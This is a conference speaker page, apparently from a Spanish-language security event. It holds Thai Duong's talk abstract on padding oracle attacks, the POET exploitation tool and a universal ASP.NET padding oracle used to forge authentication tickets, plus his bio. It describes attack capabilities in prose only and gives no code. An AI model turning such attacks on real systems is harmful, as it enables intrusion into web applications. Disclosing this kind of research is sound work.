THAI DUONG (Chief Information Security Officer)

Padding Oracles Everywhere

The first part of the presentation introduces the audience to Padding Oracle Attacks, the cryptographic concepts of the vulnerability, and finally how to exploit it. We also describe the algorithms implemented in POET (Padding Oracle Exploit Tool). POET is the free tool that we released a few months ago which can automatically find and exploit Padding Oracle vulnerabilities in web applications.

The second part presents a previously unknown advanced attack. The most significant new discovery is an universal Padding Oracle affecting every ASP.NET web application. In short, you can decrypt cookies, view states, form authentication tickets, membership password, user data, and anything else encrypted using the framework's API!

Finally we demonstrate the attacks against real world applications. We use the Padding Oracle attack to decrypt data and use CBC-R to encrypt our modifications. Then we abuse components present in every ASP.NET installation to forge authentication tickets and access applications with administration rights. The vulnerabilities exploited affect the framework used by 25% of the Internet websites.The impact of the attack depends on the applications installed on the server, from information disclosure to total system compromise.

Sobre Thai Duong

Thai Duong is a hacker from Vietnam, currently working as the Chief Information Security Officer at one of Vietnam's leading commercial banks where he leads the Information Security Department to protect 4 million customers completing more than 500,000 transactions a day. Thai has eight years experience in computer security, and now specializes in cryptography and application security. He co-authored a research on MD5 extension attack that made the Top Ten Web Hacking Techniques of 2009. Recently, he presented about practical crypto attacks at Black Hat Europe 2010.

« volver a Speakers

NOVEDADES


diseño: GrafikaWeb